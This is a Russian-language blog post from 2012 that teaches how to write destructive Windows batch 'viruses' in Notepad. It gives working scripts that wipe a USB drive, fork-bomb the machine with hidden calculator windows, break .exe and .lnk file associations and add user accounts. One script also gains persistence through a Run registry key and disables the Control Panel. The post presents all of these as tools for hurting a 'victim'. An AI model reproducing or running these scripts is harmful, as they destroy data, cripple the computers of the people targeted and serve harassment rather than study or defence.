Меню сайта
Статистика
Онлайн всего: 1
Гостей: 1
Пользователей: 0
Главная » 2012 Январь 9 » Пишем вирусы в блокноте
Вирусо-писание в блокноте.
Это один из распространенных вирусо-писаний, и самый легкий. Даже сказать, это не совсем вирус. Но как вирус лишает пользователя удобств пользоания компьютером)Мы просто создадим скрипт, который будет выполнять все действия одновременно нагружая компьютер и не только. Давайте начнем с простого, чтобы вы поняли, что будет дальше. 1) Открываем блокнот; 2) Пишем в нем «Calc», без кавычек; 3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat 4) Откроем файлик и увидим, что открылся Калькулятор)) Ну что? понимаете к чему я веду? Нет? Мы будем пользоваться простыми командами виндовс! Сейчас я все поясню) Открываем блокнот, пишем: Code time 01:01 date 13.12.11 И созраняем в .bat... Если запустим, то поменяется время и дата. Наверное уже догадались) ВВот еще примерчик: Code del F:\ *.* /q label F:Ueban Эта программа, которая удалит ввсе с флешки, если она вставвлена, и переименует ее на Ueban Итак мы закончили с написанием простых, безобидных программ...переходим к более жестоким) Code :x ; Start calc goto x ; Угадайте, что сделает эта программа? За 15 секунд она откроет 50 калькуляторов прежде, чем юзер успеет понять, что случилось)) Конечно, пока программа ббудет открыввать калькуляторы, будет отображаться черное окошко(командная строка выполнений) если ее закрыть то программа завершится. Чтобы не дать юзеру сделать этого рассмотрим еще 2 новые команды. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус: Code @echo off :x ; >nul Start calc >nul goto x ; >nul Мдаа комп поввиснет, если программа будет бесконечно открывать калькуляторы.Но мы введь можем открывать не толлько калькуляторы! Можно запустить и taskmgr(Диспетчер задач) можно и mspaint(Пэйнт) и так далее... Теперь небольшой перечень того, что можно писать в блокнотовском вирусе. СПИСОК: Code 1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 2) «label x:y» - переименовывает диск x на имя y (пример label C:error); 3) «time х:у» - меняет время на х часов и у минут (пример time 14:27); 4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05); 5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Разберем еще пару жестоких скриптов. Code copy ""%0"" "%SystemRoot%\system32\File.bat" reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше)) Code assoc .lnk=.txt >nul assoc .exe=.mp3 >nul Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Жеесть да? Ну вот и все) Всем удачных ввирусо-писаний, пусть нубы познают плату за флуд! |
| Всего комментариев: 0 | |